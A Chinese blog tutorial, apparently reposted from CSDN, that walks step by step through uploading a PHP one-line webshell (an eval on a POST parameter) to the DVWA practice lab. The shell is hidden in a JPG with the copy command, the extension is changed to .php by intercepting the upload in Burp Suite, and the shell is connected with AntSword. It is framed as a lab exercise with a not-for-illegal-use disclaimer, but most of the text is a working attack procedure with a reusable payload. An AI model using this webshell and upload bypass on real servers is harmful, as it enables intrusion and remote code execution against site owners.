首页 > 电脑常识 > 运维

上传图片格式一句话木马

admin 运维 2021-04-26 15:58:25 php   windows   linux   服务器   安全  
后台-系统设置-扩展变量-手机广告位-内容正文底部

一、 随便找一张jpg图片在这里插入图片描述

二、 新建一个txt文档在这里插入图片描述

三、 在文本文档中写入一句话木马

本次实验使用的木马为password
<?php @eval($_POST['密码']);?>

在这里插入图片描述

四、 写入完成后将后缀名.txt改为.php在这里插入图片描述

五、 合并文件

通过CMD进入储存jpg文件和php文件的目录
命令格式: cd C:\muma
使用copy命令合并文件
命令格式: copy 图片.jpg/b + 木马.php/a 合成.jpg
最后输出合并的木马文件muma.jpg在这里插入图片描述

六、 打开靶场登陆DVWA

默认用户名admin
默认密码password在这里插入图片描述

七、更改安全性

左侧点击DVWA Security更改安全性 改为low点击 Submit 确定在这里插入图片描述

八、 准备上传

点击左侧的File Upload(文件上传)
然后将FoxyProxyBurp代理打开

FoxyProxy安装与配置
在这里插入图片描述

九、 开启BURP SUITE

kali直接在终端中输入burpsuite即可打开
Windows与mac端需要自行安装

在这里插入图片描述

十、 配置BURP

BURP内点击Proxy(代理)再点击Intercept(截断)之后等待数据包在这里插入图片描述

十一、 上传

点击浏览 选择刚刚合并出来的muma.jpg文件 然后点击上传或者(Upload)在这里插入图片描述

十二、BURP截包

点击上传后 浏览器开始无响应 开始BURP发现已经将数据包拦截了下来在这里插入图片描述

十三、 修改数据包

将下方抓到的宝muma.jpg改为muma.php然后点击右上角的放包(Forward)一直点击 直到变成灰色无法点击为止在这里插入图片描述

十四、 查看上传路径

红字提示上传文件到../../hackable/uploads/muma.php
当前URL栏中的路径为/xxx.xxx.xxx.xxx/DVWA/vulnerabilities/upload#
../的意思为返回上一级目录 两个../../代表返回前两个目录 也就代表返回到了/xxx.xxx.xxx.xxx/DVWA/目录
结合提供的路径得出 上传的完整路径为/xxx.xxx.xxx.xxx/DVWA/hackable/uploads/muma.php在这里插入图片描述

十五、 验证木马

在浏览器的URL栏中输入刚刚得出的路径 查看是否能得到反馈 出现信息 代表木马存在 然后复制下当前的URL地址等待连接在这里插入图片描述

十六、 连接木马

打开蚁剑 右键空白处 点击添加数据在这里插入图片描述
URL地址中粘贴刚刚复制的地址
连接密码填写制作一句话木马时设置的密码在这里插入图片描述
完成后点击添加
窗口自动关闭 下方显示添加数据成功在这里插入图片描述
双击添加的木马 出现文件列表 代表一句话木马上传并成功在这里插入图片描述
相关链接 FoxyProxy安装与配置

如有问题 还请见谅

注意:本实验仅供个人测试时使用 请勿用于非法用途

文章来源:https://blog.csdn.net/weixin_46017292/article/details/116120156

后台-系统设置-扩展变量-手机广告位-内容正文底部
版权声明

本文仅代表作者观点,不代表本站立场。
本文系作者授权发表,未经许可,不得转载。
本文地址:https://jcdi.cn/diannaochangshi/fwq1/745.html

留言与评论(共有 0 条评论)
   
验证码:
后台-系统设置-扩展变量-手机广告位-评论底部广告位

教程弟

https://www.jcdi.cn/

统计代码 | 京ICP1234567-2号

Powered By 教程弟 教程弟

使用手机软件扫描微信二维码